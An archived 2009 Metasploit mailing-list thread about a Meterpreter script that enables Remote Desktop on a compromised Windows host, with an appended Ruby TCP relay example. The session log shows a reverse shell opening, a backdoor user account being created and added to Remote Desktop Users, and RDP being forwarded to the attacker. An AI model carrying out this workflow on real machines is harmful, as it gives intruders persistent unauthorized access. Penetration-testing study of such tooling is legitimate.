Metasploit mailing list archives

Meterpreter script for enabled Remote Desktop


From: natron at invisibledenizen.org (natron)
Date: Sat, 3 Jan 2009 17:54:33 -0600

I extended this a tad to automatically forward a local port to the
remote 3389 service.  I copied in the relevant code from
lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
and it seems to work just fine.

FYI, any accounts created through use of the getgui script only have
user access on the machine; you'll still want to manually drop them into
any groups you like.

-n

[*] Handler binding to LHOST 192.168.206.128
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.206.128:4444 -> 192.168.206.1:2014)

meterpreter > run getgui -h
Windows Get GUI Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com

Usage: getgui -u <username> -p <password> -n <lport>

OPTIONS:

    -h <opt>  Help menu.
    -n <opt>  The local port used to forward traffic to the enabled remote desktop port.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.

Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com

Usage: getgui -u <username> -p <password> -n <lport>

OPTIONS:

    -h <opt>  Help menu.
    -n <opt>  The local port used to forward traffic to the enabled remote desktop port.
    -p <opt>  The Password of the user to add.
    -u <opt>  The Username of the user to add.

meterpreter > run getgui -n 53389 -u rdpuser -p rdppassword
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez at darkoperator.com
[*] Enabling Remote Desktop
[*]     RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]     Terminal Services service is already set to auto
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: rdpuser with Password: rdppassword
[*]     Adding User: rdpuser to local group Remote Desktop Users
[*] You can now login with the created user
[*] Local TCP relay created: 0.0.0.0:53389 <-> 127.0.0.1:3389
meterpreter >



2009/1/2 Carlos Perez <carlos_perez at darkoperator.com>:
Glad you guys liked my scripts.
For updates on the scripts, I tend to post them on my blog, in the forum for
Remote-exploit, and the forums at pauldotcom.com

2009/1/2 Rob Fuller <mubix at room362.com>

Darkoperator also made a windows enumeration script.
 http://forum.pauldotcom.com/viewtopic.php?id=151

2009/1/2 H D Moore <hdm at metasploit.com>

Nice implementation by Carlos Perez:
http://forums.remote-exploit.org/showthread.php?t=19205
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework




-------------- next part --------------
A non-text attachment was scrubbed...
Name: getgui.rb
Type: application/octet-stream
Size: 5988 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090103/2a405d6a/attachment.obj>
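The one line of the transcript above that natron's extension adds is "Local TCP relay created: 0.0.0.0:53389 <-> 127.0.0.1:3389". The following is an added example, not code from the attached getgui.rb or from Meterpreter's net.rb portfwd code: it is a plain-socket relay that accepts on a local port and pumps bytes both ways to a target host:port. Plain TCP sockets stand in for the Meterpreter session channels that the real portfwd relays through (an assumption made so the relay runs and can be tested offline), and the echo service in relay_roundtrip is constructed here to stand in for the victim's RDP listener. Note that the transcript's relay bound 0.0.0.0, which exposes the pivot to every host that can reach the attacker's machine; this example binds loopback by default.

```ruby
require 'socket'

# Minimal local TCP relay in plain Ruby (added example, not Meterpreter's
# portfwd). Accepts on bind_host:lport and forwards each connection to
# rhost:rport, copying bytes in both directions until either side hangs up.
class TcpRelay
  attr_reader :lport

  # rhost/rport: where accepted connections are forwarded (the "3389" side).
  # lport 0 lets the OS pick a free port. bind_host defaults to loopback so the
  # pivot is not reachable by everyone on the attacker's network.
  def initialize(rhost, rport, lport: 0, bind_host: '127.0.0.1')
    @rhost = rhost
    @rport = rport
    @server = TCPServer.new(bind_host, lport)
    @lport = @server.addr[1] # the port actually bound
    @workers = []
  end

  # Accept connections in a background thread, one worker thread per client.
  def start
    @acceptor = Thread.new do
      loop do
        begin
          client = @server.accept
        rescue IOError, Errno::EBADF
          break # listener closed by #stop
        end
        @workers << Thread.new(client) { |c| relay(c) }
      end
    end
    self
  end

  def stop
    @server.close
    @acceptor.join if @acceptor
    @workers.each { |w| w.join(1) }
  end

  private

  # Copy bytes from src to dst until src hits EOF, then half-close dst so the
  # far side sees EOF too while the opposite direction keeps flowing.
  def pump(src, dst)
    loop { dst.write(src.readpartial(65_536)) }
  rescue EOFError, IOError, Errno::ECONNRESET, Errno::EPIPE
    dst.close_write rescue nil
  end

  def relay(client)
    remote = TCPSocket.new(@rhost, @rport)
    up   = Thread.new { pump(client, remote) }
    down = Thread.new { pump(remote, client) }
    up.join
    down.join
  rescue SystemCallError => e
    warn "relay: #{e.message}" # e.g. ECONNREFUSED when the target is down
  ensure
    client.close unless client.closed?
    remote.close if remote && !remote.closed?
  end
end

# Worked round trip: a constructed echo service stands in for the target's
# RDP listener; the message travels client -> relay -> echo and back.
# Returns the bytes read back (binary-encoded) so callers can compare them.
def relay_roundtrip(message)
  echo = TCPServer.new('127.0.0.1', 0)
  echo_thread = Thread.new do
    c = echo.accept
    begin
      loop { c.write(c.readpartial(4096)) }
    rescue EOFError, Errno::ECONNRESET
    ensure
      c.close
    end
  end

  relay = TcpRelay.new('127.0.0.1', echo.addr[1]).start
  sock = TCPSocket.new('127.0.0.1', relay.lport)
  sock.write(message)
  sock.close_write        # signal EOF so the echo side finishes
  reply = sock.read.b     # read until the relay half-closes our side
  sock.close
  relay.stop
  echo_thread.join
  echo.close
  reply
end

if $PROGRAM_NAME == __FILE__
  puts relay_roundtrip('hello through the relay')
end
```

In use, TcpRelay.new('127.0.0.1', 3389, lport: 53389) followed by start gives the same shape as the transcript's relay, after which an RDP client is pointed at localhost:53389; the difference from the real portfwd is only what sits behind the remote socket. Keep the messages pushed through relay_roundtrip small: it writes everything before reading, so a payload larger than the loopback socket buffers would stall the echo side.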

